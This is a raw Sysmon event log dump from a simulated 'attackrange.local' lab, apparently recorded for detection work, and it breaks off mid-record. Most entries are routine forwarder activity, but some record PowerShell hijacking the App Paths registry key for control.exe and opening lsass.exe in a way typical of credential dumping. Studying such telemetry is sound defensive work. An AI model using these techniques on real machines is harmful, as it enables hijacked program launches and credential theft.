Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=6813271A29A447DA064B4BC446395481,SHA256=8A471CAE38D40FF5F5F6A0F01F1CBF34E111BE7BE12038E218DE4783C122CD90,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052667Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:30.685{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5563E9C70ADE9B62823D0F52A1F504E2,SHA256=5A4EBE58B56972E35F396039CF0960F370A2791B99DC5E35ABD8BF161DBD02A1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052666Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:30.684{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8639E78E5E0FBCEF6C21EC5A26524F14,SHA256=4B2E7632D66C17C9963FC2F229DEFDD05CCD078FA9CF82BED883FA5434D1CD1C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052665Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:30.683{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CBCE7A165DD6049D1020E949B080B33B,SHA256=D011F27A080C08309E520A6C89DB6DC096F39A518F229D61C40BC3A69DDE598D,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000001052664Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:02:30.302{466BC892-F715-60EB-B77D-00000000CF01}4796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-2333072374-3391925831-3197092227-1112\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\control.exe\(Default)c:\temp\procexp64.exe 10341000x80000000000000001052663Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:30.000{466BC892-02AD-60E8-0B00-00000000CF01}624800C:\Windows\system32\lsass.exe{466BC892-F715-60EB-B77D-00000000CF01}4796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052662Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:30.000{466BC892-02AD-60E8-0B00-00000000CF01}624800C:\Windows\system32\lsass.exe{466BC892-F715-60EB-B77D-00000000CF01}4796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000809461Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:31.146{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0CA1CCE13BC728ED7FC4DE2B30DAB137,SHA256=92E98B4127716A9BBAD234BD477CE63CF460BE9B9D9B24FA1751C01DE3F28796,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052669Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:31.304{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4B8ACE3A73C2C2355AD5DB56CA27F18E,SHA256=68526EC4F560AAB08C4A60B0BF96BC090275BC9CA4B55DDC5855A94F4F9CAD8C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052672Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:32.835{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=A2D20EF768FB2C07C3C74310B079A85C,SHA256=46EDC1AD2E434E37016C0E699297125EA5FC2FAE93671EFB66C59E82FA8503A8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052671Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:32.835{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=7BADD8F163132B258AE63E3DF093E46F,SHA256=30EB2C5A9BD37A0AEABADE0414FC451AB869687AFE81B7B1FA5ACD8508DFD7F3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052670Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:32.319{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5BBEF30ACB159D0EA745AC0F60BE9591,SHA256=2E34C264A13FD00AA537F63CB07A34B530A8B8225569CB9FE305B8A09F14B2FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809462Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:32.192{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C7819EB52C53B790C28DB412F991B122,SHA256=998507D1E607E2878BFA35F1609ECF8543AD1905BF47E9C9DA95EAD6DC4CD984,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052674Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:33.404{466BC892-F715-60EB-B77D-00000000CF01}4796ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052673Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:33.335{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E2B914B97F846BD8E0DE165D30976E4C,SHA256=AFCE5D15B9E0AAF2052EA89D7ADA90C9F1838263A760806AD3887CE9C9A27780,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809464Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:33.224{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FC0C15142287280A78D324BF180BF201,SHA256=53B2E73F6DFE8CA32203F7FCD179D83E9EA1D08A1E63ECF417D467E700750DD0,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809463Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:31.278{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57396-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001052677Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:34.403{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=BF36CBF8A17A5E2C8436A192500074A7,SHA256=BF74DC0EF5326992B01DED04722EE73311E0B9B3621AE8837852B1ECA3438086,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052676Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:34.350{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BEF89EB9EF3B8B4B5A3A2460D382F063,SHA256=12CA8DD164B8900B188996A5221E582C1D7D040E1654A3B7EBC08D36A304E819,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809465Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:34.224{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C9926A327B682683444EE1C258CA7151,SHA256=ADF60C12925F3280A592CE920502193ACFD87C6070C0D3E6747D13A09BA8D278,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001052675Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:26.615{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51173-false10.0.1.12-8000- 23542300x8000000000000000809466Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:35.236{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C2C3DFBCB393620486A38C626AA81668,SHA256=21A3314FF4821BCC8A90B15A391106DA529EC27A78B5B09082B42FBFCF9DA064,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052678Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:35.366{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=07A008A1FF5BDE7B6B8DD42747BAABE0,SHA256=FE99AECE18308C170614FA2AD85529469133B46A8EA6D5740B93E9B9098BE180,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052679Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:36.385{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2B469FEFE9086545025E4673A363F8F8,SHA256=2F2D9BD7187775448687CC955F4E9E686F18EDFEC9547090FBF09BBC71DE3A3C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809467Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:36.251{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B4AC1FE8E6F591DAC6E19CA824E1466B,SHA256=9C6449A771363B845AC624320674B5D41420E414F1BBB1E1113D487C6C778556,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052720Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:37.950{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-F71D-60EB-B97D-00000000CF01}7440C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052719Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:37.887{466BC892-F71D-60EB-B97D-00000000CF01}74402392C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+154962|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052718Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:37.887{466BC892-F71D-60EB-B97D-00000000CF01}74402392C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1549f7|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052717Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:37.887{466BC892-F71D-60EB-B97D-00000000CF01}74402392C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052716Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:37.887{466BC892-F71D-60EB-B97D-00000000CF01}74402392C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052715Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:37.887{466BC892-F71D-60EB-B97D-00000000CF01}74402392C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\windows.storage.dll+609de|C:\Windows\System32\windows.storage.dll+15427c|C:\Windows\System32\windows.storage.dll+154058|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052714Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:37.887{466BC892-F71D-60EB-B97D-00000000CF01}74402392C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+609cc|C:\Windows\System32\windows.storage.dll+15427c|C:\Windows\System32\windows.storage.dll+154058|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052713Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:37.887{466BC892-F71D-60EB-B97D-00000000CF01}74402392C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+609cc|C:\Windows\System32\windows.storage.dll+15427c|C:\Windows\System32\windows.storage.dll+154058|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001052712Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:37.887{466BC892-F71D-60EB-B97D-00000000CF01}7440ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFf72ca45.TMPMD5=2C0FD6F951FA1D507F7B5C46BB749BFE,SHA256=500857DA7D87C376CB267338351A1D967C9EA82A3709662A2377A28AD4E79CBF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052711Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:37.851{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-F71D-60EB-B97D-00000000CF01}7440C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052710Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:37.803{466BC892-02B0-60E8-1600-00000000CF01}13047328C:\Windows\System32\svchost.exe{466BC892-F71D-60EB-B97D-00000000CF01}7440C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052709Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:37.803{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F71D-60EB-B97D-00000000CF01}7440C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052708Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:37.733{466BC892-32D3-60E8-770B-00000000CF01}63565264C:\Windows\Explorer.EXE{466BC892-F71D-60EB-B97D-00000000CF01}7440C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052707Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 